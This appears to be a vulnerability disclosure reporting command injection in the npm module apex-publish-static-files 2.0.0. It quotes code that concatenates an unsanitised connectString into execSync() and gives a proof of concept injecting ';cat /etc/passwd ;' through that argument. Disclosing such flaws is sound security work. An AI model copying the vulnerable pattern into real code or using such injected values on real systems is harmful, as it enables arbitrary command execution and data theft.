I would like to report a command injection vulnerability in the apex-publish-static-files npm module.
It allows arbitrary shell command execution through a maliciously crafted argument.
module name: apex-publish-static-filesversion:2.0.0npm page: https://www.npmjs.com/package/apex-publish-static-files
>Uploads all files from a local directory to Oracle APEX
15 downloads in the last day
~170 downloads in the last month
apex-publish-static-files does not sanitize the connectionString argument, and subsequently passes it to execSync(), thus allowing arbitrary shell command injection.
Vulnerability Code : https://github.com/vincentmorneau/apex-publish-static-files/blob/master/index.js#54-66
const childProcess = execSync(
'"' + opts.sqlclPath + '"' + // Sqlcl path
' ' + opts.connectString + // Connect string (user/pass@server:port/sid)
' @"' + path.resolve(__dirname, 'lib/script') + '"' + // Sql to execute
' "' + path.resolve(__dirname, 'lib/distUpload.js') + '"' + // Param &1 (js to execute)
' "' + path.resolve(opts.directory) + '"' + // Param &2
' ' + opts.appID + // Param &3
' "' + opts.destination + '"' + // Param &4
' "' + opts.pluginName + '"' // Param &5
, {
encoding: 'utf8'
}
);
var publisher = require('apex-publish-static-files');
publisher.publish({
connectString: ";cat /etc/passwd ;",
directory: "public",
appID: 111
});
node index.js
F342500
OS: WSL Ubuntu 16.04
NODE: v10.8.0
NPM : 6.2.0
It allows arbitrary shell command execution through a maliciously crafted argument.